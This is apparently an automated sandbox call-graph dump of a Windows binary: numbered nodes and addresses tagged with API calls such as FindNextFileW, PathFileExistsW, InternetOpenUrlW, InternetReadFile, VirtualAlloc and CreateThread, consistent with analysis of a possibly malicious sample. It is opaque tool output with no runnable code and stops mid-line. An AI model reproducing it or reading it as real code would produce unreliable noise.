124932 6bfa3 124931->124932 124933 6bfa8 124932->124933 124934 6bfb9 124932->124934 124935 642a7 27 API calls 124933->124935 124936 6210e 26 API calls 124934->124936 124937 6bfb4 124935->124937 124949 6bfc1 124936->124949 124939 61f29 26 API calls 124937->124939 124938 6c0a8 FindNextFileW 124940 6c0be FindClose 124938->124940 124938->124949 124941 6651c 124939->124941 124942 642a7 27 API calls 124940->124942 124956 6c22e 124941->124956 124943 6c0d1 124942->124943 124944 62000 26 API calls 124943->124944 124944->124937 124945 642a7 27 API calls 124945->124949 124946 68bcd 27 API calls 124946->124949 124948 61f29 26 API calls 124948->124949 124949->124938 124949->124945 124949->124946 124949->124948 124950 6c095 PathFileExistsW 124949->124950 124953 61f29 26 API calls 124949->124953 125152 63069 124949->125152 124950->124949 124951 6c0e9 FindClose 124950->124951 125161 63353 124951->125161 124953->124938 124955 61f29 26 API calls 124955->124943 124957 6c23d 124956->124957 125263 6c105 124957->125263 124960 68bcd 27 API calls 124961 6c255 124960->124961 124962 6c25e PathFileExistsW 124961->124962 124963 6c269 124962->124963 124970 6c274 124962->124970 125293 6c558 27 API calls 124963->125293 124965 68bcd 27 API calls 124965->124970 124969 61f29 26 API calls 124969->124970 124970->124965 124970->124969 124971 6c2c9 PathFileExistsW 124970->124971 124972 6c2e5 124970->124972 125275 61f33 124970->125275 125284 79dd2 124970->125284 125290 6c601 124970->125290 125294 6c558 27 API calls 124970->125294 124971->124970 124974 61f29 26 API calls 124972->124974 124975 6c2ed 124974->124975 124976 61f29 26 API calls 124975->124976 124977 66524 124976->124977 124978 6c2fd 124977->124978 124979 6c30c 124978->124979 125320 6c168 124979->125320 124982 68bcd 27 API calls 124983 6c324 124982->124983 124984 6c32d PathFileExistsW 124983->124984 124985 6c338 124984->124985 124992 6c343 124984->124992 125332 6c558 27 API calls 124985->125332 124987 68bcd 27 API calls 124987->124992 124988 61f33 27 API calls 124988->124992 124989 61f29 26 API calls 124989->124992 124990 79dd2 27 API calls 124990->124992 124991 6c601 27 API calls 124991->124992 124992->124987 124992->124988 124992->124989 124992->124990 124992->124991 124993 6c398 PathFileExistsW 124992->124993 124994 6c3b4 124992->124994 125333 6c558 27 API calls 124992->125333 124993->124992 124996 61f29 26 API calls 124994->124996 124997 6c3bc 124996->124997 124998 61f29 26 API calls 124997->124998 124999 6652c 124998->124999 125000 6c3cc 124999->125000 125334 6c1cb 125000->125334 125003 68bcd 27 API calls 125004 6c3ed 125003->125004 125005 6c3f6 PathFileExistsW 125004->125005 125006 6c403 125005->125006 125007 6c40e 125005->125007 125008 63353 26 API calls 125006->125008 125009 642a7 27 API calls 125007->125009 125010 6c40c 125008->125010 125009->125010 125011 61f29 26 API calls 125010->125011 125012 6c420 125011->125012 125013 61f29 26 API calls 125012->125013 125014 66537 125013->125014 125015 6c42f 125014->125015 125016 6c105 28 API calls 125015->125016 125017 6c440 125016->125017 125018 68bcd 27 API calls 125017->125018 125019 6c450 125018->125019 125020 6c459 PathFileExistsW 125019->125020 125021 6c466 125020->125021 125022 6c471 125020->125022 125023 63353 26 API calls 125021->125023 125024 642a7 27 API calls 125022->125024 125025 6c46f 125023->125025 125024->125025 125026 61f29 26 API calls 125025->125026 125027 6c483 125026->125027 125028 61f29 26 API calls 125027->125028 125029 66542 125028->125029 125030 6c492 125029->125030 125031 6c168 28 API calls 125030->125031 125032 6c4a3 125031->125032 125033 68bcd 27 API calls 125032->125033 125034 6c4b3 125033->125034 125035 6c4bc PathFileExistsW 125034->125035 125036 6c4d4 125035->125036 125037 6c4c9 125035->125037 125039 642a7 27 API calls 125036->125039 125038 63353 26 API calls 125037->125038 125040 6c4d2 125038->125040 125039->125040 125041 61f29 26 API calls 125040->125041 125042 6c4e6 125041->125042 125043 61f29 26 API calls 125042->125043 125044 6654d 125043->125044 125045 6c4f5 125044->125045 125046 6c1cb 28 API calls 125045->125046 125047 6c506 125046->125047 125048 68bcd 27 API calls 125047->125048 125049 6c516 125048->125049 125050 6c51f PathFileExistsW 125049->125050 125051 6c537 125050->125051 125052 6c52c 125050->125052 125053 642a7 27 API calls 125051->125053 125054 63353 26 API calls 125052->125054 125055 6c535 125053->125055 125054->125055 125056 61f29 26 API calls 125055->125056 125057 6c549 125056->125057 125058 61f29 26 API calls 125057->125058 125059 6c551 125058->125059 125059->124762 125061 7a71d GetFileSize 125060->125061 125062 7a719 125060->125062 125346 62492 125061->125346 125062->124764 125064 7a732 125065 7a743 ReadFile 125064->125065 125066 7a752 CloseHandle 125065->125066 125067 7a750 125065->125067 125066->125062 125067->125066 125069 6210e 26 API calls 125068->125069 125070 66cca 125069->125070 125381 63393 125070->125381 125072 66ce6 125072->124784 125074 6210e 26 API calls 125073->125074 125075 66983 125074->125075 125076 7a6ef 31 API calls 125075->125076 125077 66994 125076->125077 125078 669a6 125077->125078 125079 66998 125077->125079 125081 620bd 27 API calls 125078->125081 125385 620bd 125079->125385 125086 669b3 125081->125086 125082 669a4 125083 62000 26 API calls 125082->125083 125084 66679 125083->125084 125092 66a18 125084->125092 125085 669f4 125088 620bd 27 API calls 125085->125088 125086->125085 125087 669e5 125086->125087 125391 642ce 125087->125391 125090 669f2 125088->125090 125091 62000 26 API calls 125090->125091 125091->125082 125093 66a2e 125092->125093 125094 66a32 125093->125094 125096 66a43 125093->125096 125095 620bd 27 API calls 125094->125095 125103 66683 125095->125103 125423 66afd 125096->125423 125099 66abe ctype 125426 620e4 125099->125426 125100 66adb ctype 125102 620bd 27 API calls 125100->125102 125102->125103 125104 6200a 125103->125104 125105 62061 125104->125105 125106 62019 125104->125106 125105->124779 125107 62411 26 API calls 125106->125107 125108 62022 125107->125108 125109 62064 125108->125109 125110 6203d 125108->125110 125433 626c6 125109->125433 125432 63170 27 API calls 125110->125432 125122->124784 125124 6246b 125123->125124 125125 6241e 125123->125125 125124->124923 125125->125124 125127 6280a 125125->125127 125128 62ec0 125127->125128 125131 616dd 125128->125131 125130 62ed0 125130->125124 125132 616ef 125131->125132 125135 616f4 125131->125135 125139 995f2 26 API calls 3 library calls 125132->125139 125134 9968c 125140 9969a 11 API calls _abort 125134->125140 125135->125132 125136 6171c 125135->125136 125136->125130 125138 99699 125139->125134 125140->125138 125142 642b2 125141->125142 125167 6228d 125142->125167 125144 642bd 125171 642e8 125144->125171 125237 61fa6 125147->125237 125149 68bdc char_traits 125241 6322b 125149->125241 125151 68bf8 125151->124929 125154 6307c 125152->125154 125153 630bd 125246 63326 125153->125246 125154->125153 125158 630b2 125154->125158 125156 63353 26 API calls 125157 630d5 125156->125157 125157->124949 125245 632f3 27 API calls 125158->125245 125160 630bb 125160->125156 125162 63361 125161->125162 125163 6228d 26 API calls 125162->125163 125164 6337b 125163->125164 125259 62376 125164->125259 125168 622e7 125167->125168 125169 6229a 125167->125169 125168->125144 125169->125168 125175 627d5 26 API calls std::_Deallocate 125169->125175 125172 642f6 char_traits 125171->125172 125176 64307 125172->125176 125174 642c7 125174->124927 125175->125168 125177 64317 125176->125177 125178 64334 125177->125178 125179 6431d 125177->125179 125193 6284e 125178->125193 125183 64396 125179->125183 125182 64332 125182->125174 125204 628f2 125183->125204 125185 643aa 125186 643d4 125185->125186 125187 643bf 125185->125187 125189 6284e 27 API calls 125186->125189 125209 6440e 27 API calls 125187->125209 125192 643d2 125189->125192 125190 643c8 125210 62cd8 27 API calls 125190->125210 125192->125182 125194 6285a 125193->125194 125195 62863 125194->125195 125196 628bb 125194->125196 125199 6286c 125195->125199 125200 6287f 125195->125200 125218 62911 27 API calls 125196->125218 125212 62b75 125199->125212 125201 6287d 125200->125201 125203 6228d 26 API calls 125200->125203 125201->125182 125203->125201 125206 628fd 125204->125206 125205 62904 125205->125185 125206->125205 125211 62d3b 27 API calls 125206->125211 125209->125190 125210->125192 125213 62b7f __EH_prolog 125212->125213 125219 62ee6 125213->125219 125215 6228d 26 API calls 125217 62c59 125215->125217 125216 62beb 125216->125215 125217->125201 125220 62f20 125219->125220 125223 61686 125220->125223 125222 62f2f 125222->125216 125224 61694 125223->125224 125225 61690 125223->125225 125226 616d0 125224->125226 125228 616be 125224->125228 125225->125222 125227 91db2 new 8 API calls 125226->125227 125230 616c4 125227->125230 125231 91db2 125228->125231 125230->125222 125234 91db7 ___std_exception_copy 125231->125234 125232 91de3 125232->125230 125233 9fa69 new 7 API calls 125233->125234 125234->125232 125234->125233 125235 92c11 Concurrency::cancel_current_task RaiseException 125234->125235 125236 92613 Concurrency::cancel_current_task RaiseException 125234->125236 125235->125234 125236->125234 125238 61fae 125237->125238 125239 6228d 26 API calls 125238->125239 125240 61fb9 125239->125240 125240->125149 125243 63238 125241->125243 125242 63256 125242->125151 125243->125242 125244 6284e 27 API calls 125243->125244 125244->125242 125245->125160 125249 637be 125246->125249 125248 63335 125248->125160 125250 628f2 27 API calls 125249->125250 125251 637d2 125250->125251 125252 637f4 125251->125252 125253 63842 125251->125253 125256 6284e 27 API calls 125252->125256 125257 63805 125252->125257 125258 62911 27 API calls 125253->125258 125256->125257 125257->125248 125260 62388 125259->125260 125261 6228d 26 API calls 125260->125261 125262 6240a 125261->125262 125262->124955 125264 6c118 125263->125264 125265 642a7 27 API calls 125264->125265 125266 6c122 125265->125266 125267 6c137 PathFileExistsW 125266->125267 125268 6c144 125267->125268 125269 6c14f 125267->125269 125270 63353 26 API calls 125268->125270 125271 642a7 27 API calls 125269->125271 125272 6c14d 125270->125272 125271->125272 125273 61f29 26 API calls 125272->125273 125274 6c161 125273->125274 125274->124960 125276 61f42 125275->125276 125283 61f8a 125275->125283 125277 6228d 26 API calls 125276->125277 125278 61f4b 125277->125278 125279 61f8d 125278->125279 125281 61f66 125278->125281 125280 62376 26 API calls 125279->125280 125280->125283 125295 63131 27 API calls 125281->125295 125283->124970 125285 79deb ___scrt_fastfail 125284->125285 125296 9ee92 125285->125296 125288 642a7 27 API calls 125289 79e05 125288->125289 125289->124970 125308 63a79 125290->125308 125292 6c615 125292->124970 125293->124970 125294->124970 125295->125283 125297 9ee9e 125296->125297 125300 9eccc 125297->125300 125301 9ece3 125300->125301 125305 79df7 125301->125305 125306 9a892 20 API calls __dosmaperr 125301->125306 125303 9ed27 125307 9966d 26 API calls std::_Deallocate 125303->125307 125305->125288 125306->125303 125307->125305 125309 628f2 27 API calls 125308->125309 125310 63a8d 125309->125310 125311 628f2 27 API calls 125310->125311 125312 63a99 125311->125312 125313 63ad2 125312->125313 125314 63ccc 125312->125314 125316 6284e 27 API calls 125313->125316 125318 63afd 125313->125318 125319 62911 27 API calls 125314->125319 125316->125318 125318->125292 125321 6c17b 125320->125321 125322 642a7 27 API calls 125321->125322 125323 6c185 125322->125323 125324 6c19a PathFileExistsW 125323->125324 125325 6c1a7 125324->125325 125326 6c1b2 125324->125326 125328 63353 26 API calls 125325->125328 125327 642a7 27 API calls 125326->125327 125329 6c1b0 125327->125329 125328->125329 125330 61f29 26 API calls 125329->125330 125331 6c1c4 125330->125331 125331->124982 125332->124992 125333->124992 125335 6c1de 125334->125335 125336 642a7 27 API calls 125335->125336 125337 6c1e8 125336->125337 125338 6c1fd PathFileExistsW 125337->125338 125339 6c215 125338->125339 125340 6c20a 125338->125340 125342 642a7 27 API calls 125339->125342 125341 63353 26 API calls 125340->125341 125343 6c213 125341->125343 125342->125343 125344 61f29 26 API calls 125343->125344 125345 6c227 125344->125345 125345->125003 125347 6249d 125346->125347 125349 624a6 125347->125349 125350 62acb 125347->125350 125349->125064 125351 62ad9 125350->125351 125352 62b21 125351->125352 125353 62ae9 125351->125353 125369 62911 27 API calls 125352->125369 125357 62afa 125353->125357 125358 62956 125353->125358 125357->125349 125359 62962 125358->125359 125360 629c3 125359->125360 125361 6296b 125359->125361 125376 62911 27 API calls 125360->125376 125364 62987 125361->125364 125365 62974 125361->125365 125366 62985 125364->125366 125368 62411 26 API calls 125364->125368 125370 62d46 125365->125370 125366->125357 125368->125366 125371 62d50 __EH_prolog 125370->125371 125377 62ef9 125371->125377 125373 62411 26 API calls 125375 62e2a 125373->125375 125374 62dbc 125374->125373 125375->125366 125378 62f36 125377->125378 125379 61686 8 API calls 125378->125379 125380 62f45 125379->125380 125380->125374 125383 633a0 125381->125383 125382 633be 125382->125072 125383->125382 125384 62956 27 API calls 125383->125384 125384->125382 125386 620c8 125385->125386 125387 62411 26 API calls 125386->125387 125388 620d3 125387->125388 125394 62537 125388->125394 125417 64368 125391->125417 125395 62545 125394->125395 125398 62556 125395->125398 125397 620dd 125397->125082 125399 62566 125398->125399 125400 62581 125399->125400 125401 6256c 125399->125401 125402 62956 27 API calls 125400->125402 125405 625b5 125401->125405 125404 6257f 125402->125404 125404->125397 125406 628f2 27 API calls 125405->125406 125407 625c9 125406->125407 125408 625f3 125407->125408 125409 625de 125407->125409 125411 62956 27 API calls 125408->125411 125415 62aac 27 API calls 125409->125415 125414 625f1 125411->125414 125412 625e7 125416 62a4b 27 API calls 125412->125416 125414->125404 125415->125412 125416->125414 125418 64374 125417->125418 125419 62411 26 API calls 125418->125419 125420 6437f 125419->125420 125421 625b5 27 API calls 125420->125421 125422 642e1 125421->125422 125422->125090 125424 66b12 LoadLibraryA GetProcAddress 125423->125424 125425 66ab5 125423->125425 125424->125425 125425->125099 125425->125100 125427 620ef 125426->125427 125428 62411 26 API calls 125427->125428 125429 620fa 125428->125429 125430 62556 27 API calls 125429->125430 125431 62107 125430->125431 125431->125103 125432->125105 125434 626d8 125433->125434 125435 62411 26 API calls 125434->125435 125436 6275a 125435->125436 125436->125105 125713 6fe677e0 125716 6fe66420 125713->125716 125717 6fe66483 __DllMainCRTStartup@12 125716->125717 125719 6fe664ce 125717->125719 125720 6fea4f70 125717->125720 125740 6fea4fa0 125720->125740 125721 6fea5131 125742 6fe7ef60 36 API calls __DllMainCRTStartup@12 125721->125742 125722 6fea5179 125722->125719 125723 6fea51ea 125746 6fea56a0 33 API calls __DllMainCRTStartup@12 125723->125746 125730 6fea518d 125743 6fea55b0 33 API calls __DllMainCRTStartup@12 125730->125743 125734 6fea519e 125744 6fea55b0 33 API calls __DllMainCRTStartup@12 125734->125744 125736 6fea4fd0 125745 6fea55d0 33 API calls __DllMainCRTStartup@12 125736->125745 125737 6fe80540 33 API calls __DllMainCRTStartup@12 125737->125740 125738 6fe73980 HeapFree __DllMainCRTStartup@12 125738->125740 125739 6fea46d0 33 API calls __DllMainCRTStartup@12 125739->125740 125740->125721 125740->125722 125740->125723 125740->125730 125740->125734 125740->125736 125740->125737 125740->125738 125740->125739 125741 6fea50e0 WaitOnAddress 125740->125741 125741->125740 125741->125741 125742->125722 125747 74049 125760 79664 125747->125760 125749 74052 125770 62125 125749->125770 125752 64be3 62 API calls 125753 7406d 125752->125753 125754 62000 26 API calls 125753->125754 125755 753c3 125754->125755 125756 62000 26 API calls 125755->125756 125757 753d8 125756->125757 125758 62000 26 API calls 125757->125758 125759 753e4 125758->125759 125761 6210e 26 API calls 125760->125761 125762 79674 ___std_exception_copy 125761->125762 125763 79683 InternetOpenW InternetOpenUrlW 125762->125763 125764 796ab InternetReadFile 125763->125764 125765 796ca 125764->125765 125765->125764 125766 620e4 27 API calls 125765->125766 125767 796f3 InternetCloseHandle InternetCloseHandle 125765->125767 125769 62000 26 API calls 125765->125769 125766->125765 125768 79707 125767->125768 125768->125749 125769->125765 125771 6213b 125770->125771 125772 62411 26 API calls 125771->125772 125773 62155 125772->125773 125774 625b5 27 API calls 125773->125774 125775 62163 125774->125775 125775->125752 125776 997d8 125778 997e4 ___DestructExceptionObject swprintf 125776->125778 125777 997f2 125794 9a892 20 API calls __dosmaperr 125777->125794 125778->125777 125781 9981c 125778->125781 125780 997f7 125795 9966d 26 API calls std::_Deallocate 125780->125795 125789 a0d09 EnterCriticalSection 125781->125789 125784 99827 125790 998c8 125784->125790 125787 99802 ___DestructExceptionObject 125789->125784 125792 998d6 125790->125792 125791 99832 125796 9984f LeaveCriticalSection std::_Lockit::~_Lockit 125791->125796 125792->125791 125797 a5f5d 39 API calls 2 library calls 125792->125797 125794->125780 125795->125787 125796->125787 125797->125792 125798 a3958 GetLastError 125799 a3977 125798->125799 125800 a3971 125798->125800 125804 a39ce SetLastError 125799->125804 125817 a0f74 125799->125817 125824 a4fad 11 API calls 2 library calls 125800->125824 125806 a39d7 125804->125806 125805 a3991 125825 a1e15 125805->125825 125808 a39a6 125808->125805 125810 a39ad 125808->125810 125832 a371a 20 API calls __dosmaperr 125810->125832 125811 a3997 125813 a39c5 SetLastError 125811->125813 125813->125806 125814 a39b8 125815 a1e15 _free 17 API calls 125814->125815 125816 a39be 125815->125816 125816->125804 125816->125813 125822 a0f81 ___crtLCMapStringA 125817->125822 125818 a0fc1 125834 9a892 20 API calls __dosmaperr 125818->125834 125819 a0fac RtlAllocateHeap 125820 a0fbf 125819->125820 125819->125822 125820->125805 125831 a5003 11 API calls 2 library calls 125820->125831 125822->125818 125822->125819 125833 9fa69 7 API calls 2 library calls 125822->125833 125824->125799 125826 a1e49 _free 125825->125826 125827 a1e20 RtlFreeHeap 125825->125827 125826->125811 125827->125826 125828 a1e35 125827->125828 125835 9a892 20 API calls __dosmaperr 125828->125835 125830 a1e3b GetLastError 125830->125826 125831->125808 125832->125814 125833->125822 125834->125820 125835->125830 125836 6fe4a3b0 125839 6fe4a3c0 125836->125839 125848 6fe42e70 125839->125848 125846 6fe46980 35 API calls 125847 6fe4a3b9 125846->125847 125861 6fe43190 125848->125861 125853 6fe46980 126038 6fe468b0 125853->126038 125856 6fe42d40 126055 6fe42f00 125856->126055 125859 6fe42030 33 API calls 125860 6fe42dc1 125859->125860 125860->125846 125871 6fe43c40 125861->125871 125864 6fe42030 125865 6fe420c4 125864->125865 125866 6fe4209b 125864->125866 126037 6fea58e0 33 API calls __DllMainCRTStartup@12 125865->126037 125866->125853 125872 6fe43cfa 125871->125872 125874 6fe43d06 125871->125874 125945 6fe45dd0 40 API calls 125872->125945 125880 6fe43d6c 125874->125880 125946 6fe4c000 35 API calls __DllMainCRTStartup@12 125874->125946 125877 6fe43dc0 125947 6fe42130 33 API calls __DllMainCRTStartup@12 125877->125947 125879 6fe43dda 125905 6fe4c330 125879->125905 125901 6fe74490 125880->125901 125882 6fe43f32 125911 6fe75be0 125882->125911 125884 6fe75be0 33 API calls 125885 6fe4405d 125884->125885 125922 6fe45e70 125885->125922 125886 6fe43fe4 125886->125884 125889 6fe44140 125891 6fe4c330 __DllMainCRTStartup@12 33 API calls 125889->125891 125892 6fe44183 125891->125892 125926 6fe48630 125892->125926 125900 6fe42ec5 125900->125864 125902 6fe7449d 125901->125902 125955 6fe744d0 125902->125955 125985 6fe4c440 125905->125985 125907 6fe4c394 125907->125882 125912 6fe75c14 125911->125912 125913 6fe75c3d 125912->125913 126005 6fe80380 33 API calls __DllMainCRTStartup@12 125912->126005 125913->125886 125915 6fe75c70 126007 6fea58e0 33 API calls __DllMainCRTStartup@12 125915->126007 125916 6fe75c37 125916->125913 125916->125915 126006 6fe739c0 HeapFree __DllMainCRTStartup@12 125916->126006 125923 6fe45e93 125922->125923 125924 6fe4408e 125922->125924 126008 6fe45de0 HeapFree 125923->126008 125924->125889 125948 6fe74060 35 API calls __DllMainCRTStartup@12 125924->125948 125927 6fe441e6 125926->125927 125928 6fe48640 125926->125928 125930 6fe7d570 125927->125930 126009 6fea56f0 33 API calls __DllMainCRTStartup@12 125928->126009 125931 6fe4c760 __DllMainCRTStartup@12 3 API calls 125930->125931 125932 6fe7d5b0 125931->125932 125933 6fe7d652 125932->125933 125934 6fe7d5bb CreateThread 125932->125934 126012 6fea5470 33 API calls __DllMainCRTStartup@12 125933->126012 125936 6fe4425d 125934->125936 125937 6fe7d5ed 125934->125937 126013 6fe7d6d0 SetThreadStackGuarantee 125934->126013 125936->125900 125949 6fe46a50 125936->125949 125940 6fe7d621 125937->125940 126010 6fe4c770 HeapFree 125937->126010 126011 6fe4c770 HeapFree 125940->126011 125944 6fe7d630 GetLastError 125944->125936 125945->125874 125946->125877 125947->125880 125948->125889 126021 6fe46cb0 125949->126021 125952 6fe6a0f0 126026 6fe6a270 125952->126026 125968 6fe88070 33 API calls 2 library calls 125955->125968 125957 6fe74514 125958 6fe74531 125957->125958 125969 6fe4c760 125957->125969 125960 6fe745bf 125958->125960 125961 6fe7453c 125958->125961 125977 6fea5470 33 API calls __DllMainCRTStartup@12 125960->125977 125964 6fe744be 125961->125964 125978 6fea49d0 33 API calls __DllMainCRTStartup@12 125961->125978 125964->125879 125968->125957 125970 6fe7a0b0 125969->125970 125971 6fe7a0c2 125970->125971 125972 6fe7a0d9 125970->125972 125979 6fe7c150 125971->125979 125973 6fe7c150 __DllMainCRTStartup@12 3 API calls 125972->125973 125975 6fe7a0ec 125973->125975 125975->125958 125976 6fe7a0d3 125976->125958 125980 6fe7c162 RtlAllocateHeap 125979->125980 125981 6fe7c16d 125979->125981 125980->125976 125984 6fea4d50 GetProcessHeap HeapAlloc 125981->125984 125983 6fe7c172 125983->125976 125984->125983 125986 6fe4c512 125985->125986 125987 6fe4c4af 125985->125987 125989 6fe4c572 125986->125989 125990 6fe4c51a 125986->125990 126002 6fe47bc0 33 API calls __DllMainCRTStartup@12 125987->126002 126004 6fe4c7b0 RtlAllocateHeap GetProcessHeap HeapAlloc __DllMainCRTStartup@12 125989->126004 126003 6fe4c3d0 33 API calls __DllMainCRTStartup@12 125990->126003 125992 6fe4c4bb 125994 6fe48630 __DllMainCRTStartup@12 33 API calls 125992->125994 125995 6fe4c376 125994->125995 125995->125907 126001 6fea5470 33 API calls __DllMainCRTStartup@12 125995->126001 125996 6fe4c56c 125996->125995 125997 6fe48630 __DllMainCRTStartup@12 33 API calls 125996->125997 125998 6fe4c60f 125997->125998 125999 6fe48630 __DllMainCRTStartup@12 33 API calls 125998->125999 126000 6fe4c6ba 125999->126000 126002->125992 126003->125996 126004->125996 126005->125916 126006->125915 126008->125924 126010->125940 126011->125944 126014 6fe7d727 126013->126014 126015 6fe7d740 126014->126015 126019 6fe4c770 HeapFree 126014->126019 126020 6fe4c770 HeapFree 126015->126020 126018 6fe7d74f 126019->126015 126020->126018 126022 6fe44355 126021->126022 126023 6fe46d08 126021->126023 126022->125952 126025 6fe47800 34 API calls 126023->126025 126025->126022 126029 6fe6a200 126026->126029 126032 6fe6ae90 126029->126032 126033 6fe6a0fd 126032->126033 126034 6fe6aee8 126032->126034 126033->125900 126036 6fe6ad50 33 API calls __DllMainCRTStartup@12 126034->126036 126036->126033 126045 6fe468a0 126038->126045 126041 6fe6a0f0 __DllMainCRTStartup@12 33 API calls 126042 6fe4690d 126041->126042 126043 6fe46a50 34 API calls 126042->126043 126044 6fe46925 126043->126044 126044->125856 126048 6fe46890 126045->126048 126051 6fe46990 126048->126051 126054 6fe47530 CloseHandle 126051->126054 126053 6fe4689d 126053->126041 126054->126053 126058 6fe44560 126055->126058 126059 6fe4461a 126058->126059 126061 6fe44626 126058->126061 126088 6fe45dd0 40 API calls 126059->126088 126067 6fe4468c 126061->126067 126089 6fe4c000 35 API calls __DllMainCRTStartup@12 126061->126089 126063 6fe74490 33 API calls 126066 6fe446fa 126063->126066 126064 6fe446e0 126090 6fe42130 33 API calls __DllMainCRTStartup@12 126064->126090 126068 6fe4c330 __DllMainCRTStartup@12 33 API calls 126066->126068 126067->126063 126069 6fe44852 126068->126069 126070 6fe75be0 33 API calls 126069->126070 126072 6fe44904 126070->126072 126071 6fe75be0 33 API calls 126073 6fe4497d 126071->126073 126072->126071 126074 6fe45e70 HeapFree 126073->126074 126075 6fe449ae 126074->126075 126076 6fe44a60 126075->126076 126091 6fe74060 35 API calls __DllMainCRTStartup@12 126075->126091 126078 6fe4c330 __DllMainCRTStartup@12 33 API calls 126076->126078 126079 6fe44aa3 126078->126079 126080 6fe48630 __DllMainCRTStartup@12 33 API calls 126079->126080 126081 6fe44b06 126080->126081 126082 6fe7d570 36 API calls 126081->126082 126083 6fe44b7d 126082->126083 126084 6fe46a50 34 API calls 126083->126084 126087 6fe42d95 126083->126087 126085 6fe44c75 126084->126085 126086 6fe6a0f0 __DllMainCRTStartup@12 33 API calls 126085->126086 126086->126087 126087->125859 126088->126061 126089->126064 126090->126067 126091->126076 126112 6fe4b8b0 126115 6fe4a070 126112->126115 126118 6fe456e0 126115->126118 126121 6fe458d0 126118->126121 126124 6fe47f90 126121->126124 126141 6fe49ed0 126124->126141 126128 6fe4802e __DllMainCRTStartup@12 126129 6fe48081 VirtualAlloc 126128->126129 126130 6fe480b4 __DllMainCRTStartup@12 126129->126130 126145 6fe4bd40 126130->126145 126132 6fe48113 __InternalCxxFrameHandler 126151 6fe42dd0 126132->126151 126140 6fe481bd 126159 6fe411b0 126140->126159 126162 6fe74280 126140->126162 126142 6fe49f28 126141->126142 126175 6fe74c10 126142->126175 126305 6fe411e0 126145->126305 126147 6fe4bd91 126148 6fe411e0 __DllMainCRTStartup@12 33 API calls 126147->126148 126150 6fe4bdd5 126147->126150 126310 6fea56f0 33 API calls __DllMainCRTStartup@12 126147->126310 126148->126147 126150->126132 126312 6fe43040 126151->126312 126154 6fe42030 33 API calls 126155 6fe42e5a 126154->126155 126156 6fe42d10 126155->126156 126349 6fe42b60 126156->126349 126372 6fe41000 126159->126372 126163 6fe74296 126162->126163 126164 6fe742a0 CreateWaitableTimerExW 126162->126164 126163->126164 126167 6fe74341 Sleep 126163->126167 126165 6fe742b9 126164->126165 126164->126167 126166 6fe74337 CloseHandle 126165->126166 126170 6fe742f5 SetWaitableTimer 126165->126170 126166->126167 126169 6fe7439f 126167->126169 126169->126140 126170->126166 126171 6fe7431b WaitForSingleObject CloseHandle 126170->126171 126171->126169 126172 6fe74335 126171->126172 126172->126167 126173 6fea58e0 33 API calls __DllMainCRTStartup@12 126174 6fea58e0 33 API calls __DllMainCRTStartup@12 126193 6fe7c180 126175->126193 126178 6fe47fdf 126178->126128 126178->126173 126181 6fe74d49 126183 6fe74d20 126181->126183 126213 6fe73b20 126181->126213 126192 6fe74d8d CloseHandle 126183->126192 126221 6fe76010 126183->126221 126185 6fe74cd8 126185->126183 126190 6fe74d10 126185->126190 126223 6fe4c770 HeapFree 126185->126223 126224 6fe4c770 HeapFree 126190->126224 126192->126178 126225 6fe7e260 126193->126225 126197 6fe74c96 126197->126178 126208 6fe7c3a0 GetFileInformationByHandle 126197->126208 126200 6fe7c2bd CreateFileW 126201 6fe7c2f3 126200->126201 126202 6fe7c352 GetLastError 126200->126202 126203 6fe7c220 126201->126203 126204 6fe7c304 GetLastError 126201->126204 126202->126197 126202->126203 126203->126197 126286 6fe4c770 HeapFree 126203->126286 126204->126203 126205 6fe7c315 SetFileInformationByHandle 126204->126205 126205->126203 126206 6fe7c380 GetLastError CloseHandle 126205->126206 126206->126203 126207 6fe7c397 126206->126207 126207->126197 126209 6fe7c3d5 126208->126209 126210 6fe7c46b GetLastError 126208->126210 126211 6fe74cc2 126209->126211 126212 6fe7c3e2 GetFileInformationByHandleEx 126209->126212 126210->126211 126211->126181 126211->126185 126212->126210 126212->126211 126214 6fe73b24 126213->126214 126215 6fe73b5a 126213->126215 126216 6fe73b4f 126214->126216 126217 6fe73b69 126214->126217 126218 6fe73b41 126214->126218 126215->126183 126216->126183 126217->126216 126219 6fe4c760 __DllMainCRTStartup@12 3 API calls 126217->126219 126303 6fe4c790 5 API calls __DllMainCRTStartup@12 126218->126303 126219->126216 126304 6fe7603b 38 API calls __DllMainCRTStartup@12 126221->126304 126223->126190 126224->126183 126226 6fe7e29f 126225->126226 126227 6fe7e2cb 126225->126227 126228 6fe7e3cf 126226->126228 126229 6fe7e2ae 126226->126229 126287 6fe73ef0 33 API calls 126227->126287 126290 6fea5450 33 API calls __DllMainCRTStartup@12 126228->126290 126232 6fe4c760 __DllMainCRTStartup@12 3 API calls 126229->126232 126234 6fe7e2c0 126232->126234 126233 6fe7e3d8 126291 6fea5450 33 API calls __DllMainCRTStartup@12 126233->126291 126234->126227 126234->126233 126236 6fe7e360 126239 6fe7c19a 126236->126239 126288 6fe4c770 HeapFree 126236->126288 126239->126197 126245 6fe7e970 126239->126245 126240 6fe7e38b 126240->126239 126289 6fe73c40 35 API calls __DllMainCRTStartup@12 126240->126289 126244 6fe7e2f8 126244->126236 126244->126240 126249 6fe7e9ab 126245->126249 126246 6fe7c1cc 126246->126197 126246->126200 126246->126203 126247 6fe7eadd SetLastError GetFullPathNameW 126248 6fe7eaf6 GetLastError 126247->126248 126247->126249 126248->126249 126250 6fe7eb84 GetLastError 126248->126250 126249->126246 126249->126247 126251 6fe7eb16 GetLastError 126249->126251 126254 6fe7eb42 126249->126254 126292 6fea48c0 33 API calls __DllMainCRTStartup@12 126249->126292 126255 6fe7eba0 126250->126255 126256 6fe7eb93 126250->126256 126251->126249 126253 6fe7eeb1 126251->126253 126299 6fea56a0 33 API calls __DllMainCRTStartup@12 126253->126299 126257 6fe7eece 126254->126257 126258 6fe7eb4d 126254->126258 126255->126246 126294 6fe4c770 HeapFree 126255->126294 126293 6fe4c770 HeapFree 126256->126293 126300 6fea5970 33 API calls __DllMainCRTStartup@12 126257->126300 126262 6fe7eb60 126258->126262 126266 6fe7ec4b 126258->126266 126270 6fe7ed03 126262->126270 126279 6fe73b20 5 API calls 126262->126279 126268 6fe7ed0e __DllMainCRTStartup@12 126266->126268 126269 6fe73b20 5 API calls 126266->126269 126276 6fe7eda6 __DllMainCRTStartup@12 126268->126276 126296 6fea48c0 33 API calls __DllMainCRTStartup@12 126268->126296 126273 6fe7ee82 126269->126273 126270->126268 126295 6fea48c0 33 API calls __DllMainCRTStartup@12 126270->126295 126273->126268 126274 6fe7eeff 126273->126274 126302 6fea5450 33 API calls __DllMainCRTStartup@12 126274->126302 126278 6fe7eded 126276->126278 126297 6fe73c40 35 API calls 